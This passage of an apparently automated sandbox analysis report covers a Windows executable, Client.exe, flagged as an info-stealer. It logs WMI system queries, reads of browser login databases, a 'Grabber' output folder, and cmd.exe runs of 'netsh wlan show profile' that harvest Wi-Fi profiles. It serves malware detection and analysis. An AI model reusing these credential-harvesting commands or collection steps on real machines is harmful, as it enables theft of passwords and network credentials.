                                  Source: C:\Users\user\Desktop\Client.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                                  Source: C:\Users\user\Desktop\Client.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                                  Source: C:\Users\user\Desktop\Client.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                                  Source: C:\Users\user\Desktop\Client.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                                  Source: C:\Users\user\Desktop\Client.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                                  Source: C:\Users\user\Desktop\Client.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                                  Source: C:\Users\user\Desktop\Client.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                                  Source: C:\Users\user\Desktop\Client.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                                  Source: C:\Users\user\Desktop\Client.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                                  Source: C:\Users\user\Desktop\Client.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                                  Source: C:\Users\user\Desktop\Client.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                                  Source: C:\Users\user\Desktop\Client.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                                  Source: C:\Users\user\Desktop\Client.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                                  Source: C:\Users\user\Desktop\Client.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                                  Source: C:\Users\user\Desktop\Client.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                                  Source: C:\Users\user\Desktop\Client.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                                  Source: C:\Users\user\Desktop\Client.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                                  Source: C:\Users\user\Desktop\Client.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                                  Source: C:\Users\user\Desktop\Client.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                                  Source: C:\Users\user\Desktop\Client.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                                  Source: C:\Users\user\Desktop\Client.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                                  Source: C:\Users\user\Desktop\Client.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                                  Source: C:\Users\user\Desktop\Client.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                                  Source: C:\Users\user\Desktop\Client.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                                  Source: C:\Users\user\Desktop\Client.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                                  Source: C:\Users\user\Desktop\Client.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                                  Source: C:\Users\user\Desktop\Client.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                                  Source: C:\Users\user\Desktop\Client.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                                  Source: C:\Users\user\Desktop\Client.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                                  Source: C:\Users\user\Desktop\Client.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                                  Source: C:\Users\user\Desktop\Client.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                                  Source: C:\Users\user\Desktop\Client.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                                  Source: C:\Users\user\Desktop\Client.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                                  Source: C:\Users\user\Desktop\Client.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                                  Source: C:\Users\user\Desktop\Client.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                                  Source: C:\Users\user\Desktop\Client.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                                  Source: C:\Users\user\Desktop\Client.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                                  Source: C:\Users\user\Desktop\Client.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                                  Source: C:\Users\user\Desktop\Client.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                                  Source: C:\Users\user\Desktop\Client.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                                  Source: C:\Users\user\Desktop\Client.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                                  Source: C:\Users\user\Desktop\Client.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                                  Source: C:\Users\user\Desktop\Client.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                                  Source: C:\Users\user\Desktop\Client.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                                  Source: C:\Users\user\Desktop\Client.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                                  Source: C:\Users\user\Desktop\Client.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                                  Source: C:\Users\user\Desktop\Client.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                                  Source: C:\Users\user\Desktop\Client.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                                  Source: C:\Users\user\Desktop\Client.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
                                  Source: C:\Users\user\Desktop\Client.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
                                  Source: C:\Users\user\Desktop\Client.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
                                  Source: C:\Users\user\Desktop\Client.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
                                  Source: C:\Users\user\Desktop\Client.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select ProcessorId From Win32_processor
                                  Source: C:\Users\user\Desktop\Client.exeFile read: C:\Users\user\Pictures\desktop.iniJump to behavior
                                  Source: C:\Users\user\Desktop\Client.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                                  Source: tmpE1B8.tmp.dat.0.dr, tmpE164.tmp.dat.0.drBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                                  Source: Client.exeReversingLabs: Detection: 81%
                                  Source: Client.exeVirustotal: Detection: 89%
                                  Source: Client.exeString found in binary or memory: \servers.dat-launcher_profiles.json/\launcher_profiles.json
                                  Source: unknownProcess created: C:\Users\user\Desktop\Client.exe "C:\Users\user\Desktop\Client.exe"
                                  Source: C:\Users\user\Desktop\Client.exeProcess created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /C chcp 65001 && netsh wlan show profile | findstr All
                                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\chcp.com chcp 65001
                                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\netsh.exe netsh wlan show profile
                                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr All
                                  Source: C:\Users\user\Desktop\Client.exeProcess created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /C chcp 65001 && netsh wlan show networks mode=bssid
                                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\chcp.com chcp 65001
                                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\netsh.exe netsh wlan show networks mode=bssid
                                  Source: C:\Users\user\Desktop\Client.exeProcess created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /C chcp 65001 && netsh wlan show profile | findstr AllJump to behavior
                                  Source: C:\Users\user\Desktop\Client.exeProcess created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /C chcp 65001 && netsh wlan show networks mode=bssidJump to behavior
                                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\chcp.com chcp 65001Jump to behavior
                                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\netsh.exe netsh wlan show profileJump to behavior
                                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr AllJump to behavior
                                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\chcp.com chcp 65001Jump to behavior
                                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\netsh.exe netsh wlan show networks mode=bssidJump to behavior
                                  Source: C:\Users\user\Desktop\Client.exeSection loaded: mscoree.dllJump to behavior
                                  Source: C:\Users\user\Desktop\Client.exeSection loaded: apphelp.dllJump to behavior
                                  Source: C:\Users\user\Desktop\Client.exeSection loaded: kernel.appcore.dllJump to behavior
                                  Source: C:\Users\user\Desktop\Client.exeSection loaded: version.dllJump to behavior
                                  Source: C:\Users\user\Desktop\Client.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                                  Source: C:\Users\user\Desktop\Client.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                                  Source: C:\Users\user\Desktop\Client.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                                  Source: C:\Users\user\Desktop\Client.exeSection loaded: windows.storage.dllJump to behavior
                                  Source: C:\Users\user\Desktop\Client.exeSection loaded: wldp.dllJump to behavior
                                  Source: C:\Users\user\Desktop\Client.exeSection loaded: profapi.dllJump to behavior
                                  Source: C:\Users\user\Desktop\Client.exeSection loaded: cryptsp.dllJump to behavior
                                  Source: C:\Users\user\Desktop\Client.exeSection loaded: rsaenh.dllJump to behavior
                                  Source: C:\Users\user\Desktop\Client.exeSection loaded: cryptbase.dllJump to behavior
                                  Source: C:\Users\user\Desktop\Client.exeSection loaded: sspicli.dllJump to behavior
                                  Source: C:\Users\user\Desktop\Client.exeSection loaded: msasn1.dllJump to behavior
                                  Source: C:\Users\user\Desktop\Client.exeSection loaded: wbemcomn.dllJump to behavior
                                  Source: C:\Users\user\Desktop\Client.exeSection loaded: amsi.dllJump to behavior
                                  Source: C:\Users\user\Desktop\Client.exeSection loaded: userenv.dllJump to behavior
                                  Source: C:\Users\user\Desktop\Client.exeSection loaded: ntmarta.dllJump to behavior
                                  Source: C:\Users\user\Desktop\Client.exeSection loaded: uxtheme.dllJump to behavior
                                  Source: C:\Users\user\Desktop\Client.exeSection loaded: windowscodecs.dllJump to behavior
                                  Source: C:\Users\user\Desktop\Client.exeSection loaded: iphlpapi.dllJump to behavior
                                  Source: C:\Users\user\Desktop\Client.exeSection loaded: dnsapi.dllJump to behavior
                                  Source: C:\Users\user\Desktop\Client.exeSection loaded: dhcpcsvc6.dllJump to behavior
                                  Source: C:\Users\user\Desktop\Client.exeSection loaded: dhcpcsvc.dllJump to behavior
                                  Source: C:\Users\user\Desktop\Client.exeSection loaded: winnsi.dllJump to behavior
                                  Source: C:\Users\user\Desktop\Client.exeSection loaded: mswsock.dllJump to behavior
                                  Source: C:\Users\user\Desktop\Client.exeSection loaded: napinsp.dllJump to behavior
                                  Source: C:\Users\user\Desktop\Client.exeSection loaded: pnrpnsp.dllJump to behavior
                                  Source: C:\Users\user\Desktop\Client.exeSection loaded: wshbth.dllJump to behavior
                                  Source: C:\Users\user\Desktop\Client.exeSection loaded: nlaapi.dllJump to behavior
                                  Source: C:\Users\user\Desktop\Client.exeSection loaded: winrnr.dllJump to behavior
                                  Source: C:\Users\user\Desktop\Client.exeSection loaded: rasadhlp.dllJump to behavior
                                  Source: C:\Users\user\Desktop\Client.exeSection loaded: rasapi32.dllJump to behavior
                                  Source: C:\Users\user\Desktop\Client.exeSection loaded: rasman.dllJump to behavior
                                  Source: C:\Users\user\Desktop\Client.exeSection loaded: rtutils.dllJump to behavior
                                  Source: C:\Users\user\Desktop\Client.exeSection loaded: winhttp.dllJump to behavior
                                  Source: C:\Users\user\Desktop\Client.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                                  Source: C:\Users\user\Desktop\Client.exeSection loaded: fwpuclnt.dllJump to behavior
                                  Source: C:\Users\user\Desktop\Client.exeSection loaded: secur32.dllJump to behavior
                                  Source: C:\Users\user\Desktop\Client.exeSection loaded: schannel.dllJump to behavior
                                  Source: C:\Users\user\Desktop\Client.exeSection loaded: mskeyprotect.dllJump to behavior
                                  Source: C:\Users\user\Desktop\Client.exeSection loaded: ntasn1.dllJump to behavior
                                  Source: C:\Users\user\Desktop\Client.exeSection loaded: ncrypt.dllJump to behavior
                                  Source: C:\Users\user\Desktop\Client.exeSection loaded: ncryptsslp.dllJump to behavior
                                  Source: C:\Users\user\Desktop\Client.exeSection loaded: gpapi.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\chcp.comSection loaded: ulib.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\chcp.comSection loaded: fsutilext.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\netsh.exeSection loaded: kernel.appcore.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\netsh.exeSection loaded: ifmon.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\netsh.exeSection loaded: iphlpapi.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\netsh.exeSection loaded: mprapi.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\netsh.exeSection loaded: rasmontr.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\netsh.exeSection loaded: rasapi32.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\netsh.exeSection loaded: fwpuclnt.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\netsh.exeSection loaded: rasman.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\netsh.exeSection loaded: mfc42u.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\netsh.exeSection loaded: rasman.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\netsh.exeSection loaded: authfwcfg.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\netsh.exeSection loaded: fwpolicyiomgr.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\netsh.exeSection loaded: firewallapi.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\netsh.exeSection loaded: dnsapi.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\netsh.exeSection loaded: fwbase.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\netsh.exeSection loaded: dhcpcmonitor.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\netsh.exeSection loaded: dot3cfg.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\netsh.exeSection loaded: dot3api.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\netsh.exeSection loaded: onex.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\netsh.exeSection loaded: eappcfg.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\netsh.exeSection loaded: ncrypt.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\netsh.exeSection loaded: eappprxy.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\netsh.exeSection loaded: ntasn1.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\netsh.exeSection loaded: fwcfg.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\netsh.exeSection loaded: hnetmon.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\netsh.exeSection loaded: netshell.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\netsh.exeSection loaded: nlaapi.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\netsh.exeSection loaded: netsetupapi.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\netsh.exeSection loaded: netiohlp.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\netsh.exeSection loaded: dhcpcsvc.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\netsh.exeSection loaded: winnsi.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\netsh.exeSection loaded: nshhttp.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\netsh.exeSection loaded: httpapi.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\netsh.exeSection loaded: nshipsec.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\netsh.exeSection loaded: userenv.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\netsh.exeSection loaded: activeds.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\netsh.exeSection loaded: polstore.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\netsh.exeSection loaded: winipsec.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\netsh.exeSection loaded: adsldpc.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\netsh.exeSection loaded: adsldpc.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\netsh.exeSection loaded: nshwfp.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\netsh.exeSection loaded: cabinet.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\netsh.exeSection loaded: p2pnetsh.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\netsh.exeSection loaded: p2p.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\netsh.exeSection loaded: profapi.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\netsh.exeSection loaded: cryptbase.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\netsh.exeSection loaded: rpcnsh.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\netsh.exeSection loaded: whhelper.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\netsh.exeSection loaded: winhttp.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\netsh.exeSection loaded: wlancfg.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\netsh.exeSection loaded: cryptsp.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\netsh.exeSection loaded: wlanapi.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\netsh.exeSection loaded: wshelper.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\netsh.exeSection loaded: wevtapi.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\netsh.exeSection loaded: mswsock.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\netsh.exeSection loaded: peerdistsh.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\netsh.exeSection loaded: uxtheme.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\netsh.exeSection loaded: wcmapi.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\netsh.exeSection loaded: rmclient.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\netsh.exeSection loaded: mobilenetworking.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\netsh.exeSection loaded: slc.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\netsh.exeSection loaded: sppc.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\netsh.exeSection loaded: gpapi.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\netsh.exeSection loaded: ktmw32.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\netsh.exeSection loaded: mprmsg.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\netsh.exeSection loaded: windows.storage.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\netsh.exeSection loaded: wldp.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\netsh.exeSection loaded: msasn1.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\chcp.comSection loaded: ulib.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\chcp.comSection loaded: fsutilext.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\netsh.exeSection loaded: kernel.appcore.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\netsh.exeSection loaded: ifmon.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\netsh.exeSection loaded: iphlpapi.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\netsh.exeSection loaded: mprapi.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\netsh.exeSection loaded: rasmontr.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\netsh.exeSection loaded: rasapi32.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\netsh.exeSection loaded: fwpuclnt.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\netsh.exeSection loaded: rasman.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\netsh.exeSection loaded: mfc42u.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\netsh.exeSection loaded: rasman.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\netsh.exeSection loaded: authfwcfg.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\netsh.exeSection loaded: fwpolicyiomgr.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\netsh.exeSection loaded: firewallapi.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\netsh.exeSection loaded: dnsapi.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\netsh.exeSection loaded: fwbase.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\netsh.exeSection loaded: dhcpcmonitor.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\netsh.exeSection loaded: dot3cfg.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\netsh.exeSection loaded: dot3api.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\netsh.exeSection loaded: onex.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\netsh.exeSection loaded: eappcfg.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\netsh.exeSection loaded: ncrypt.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\netsh.exeSection loaded: eappprxy.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\netsh.exeSection loaded: ntasn1.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\netsh.exeSection loaded: fwcfg.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\netsh.exeSection loaded: hnetmon.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\netsh.exeSection loaded: netshell.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\netsh.exeSection loaded: nlaapi.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\netsh.exeSection loaded: netsetupapi.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\netsh.exeSection loaded: netiohlp.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\netsh.exeSection loaded: dhcpcsvc.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\netsh.exeSection loaded: winnsi.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\netsh.exeSection loaded: nshhttp.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\netsh.exeSection loaded: httpapi.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\netsh.exeSection loaded: nshipsec.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\netsh.exeSection loaded: userenv.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\netsh.exeSection loaded: activeds.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\netsh.exeSection loaded: polstore.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\netsh.exeSection loaded: winipsec.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\netsh.exeSection loaded: adsldpc.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\netsh.exeSection loaded: nshwfp.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\netsh.exeSection loaded: cabinet.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\netsh.exeSection loaded: p2pnetsh.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\netsh.exeSection loaded: p2p.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\netsh.exeSection loaded: profapi.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\netsh.exeSection loaded: cryptbase.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\netsh.exeSection loaded: rpcnsh.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\netsh.exeSection loaded: whhelper.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\netsh.exeSection loaded: winhttp.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\netsh.exeSection loaded: wlancfg.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\netsh.exeSection loaded: cryptsp.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\netsh.exeSection loaded: wlanapi.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\netsh.exeSection loaded: wshelper.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\netsh.exeSection loaded: wevtapi.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\netsh.exeSection loaded: mswsock.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\netsh.exeSection loaded: peerdistsh.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\netsh.exeSection loaded: uxtheme.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\netsh.exeSection loaded: wcmapi.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\netsh.exeSection loaded: rmclient.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\netsh.exeSection loaded: mobilenetworking.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\netsh.exeSection loaded: slc.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\netsh.exeSection loaded: sppc.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\netsh.exeSection loaded: gpapi.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\netsh.exeSection loaded: ktmw32.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\netsh.exeSection loaded: mprmsg.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\netsh.exeSection loaded: windows.storage.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\netsh.exeSection loaded: wldp.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\netsh.exeSection loaded: msasn1.dllJump to behavior
                                  Source: C:\Users\user\Desktop\Client.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{CF4CC405-E2C5-4DDD-B3CE-5E7582D8C9FA}\InprocServer32Jump to behavior
                                  Source: C:\Users\user\Desktop\Client.exeFile written: C:\Users\user\AppData\Local\5b36406dec02be6919cea39af9325731\user@849224_en-CH\Grabber\DRIVE-C\Users\user\Pictures\desktop.iniJump to behavior
                                  Source: Client.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                                  Source: Client.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                  Source: Binary string: winload_prod.pdb source: Temp.txt.0.dr
                                  Source: Binary string: ntkrnlmp.pdb source: Temp.txt.0.dr
                                  Source: Binary string: winload_prod.pdb\ source: Temp.txt.0.dr
                                  Source: Binary string: ntkrnlmp.pdb\ source: Temp.txt.0.dr
                                  Source: Client.exeStatic PE information: 0xBBAE67A1 [Sat Oct 12 02:06:25 2069 UTC]
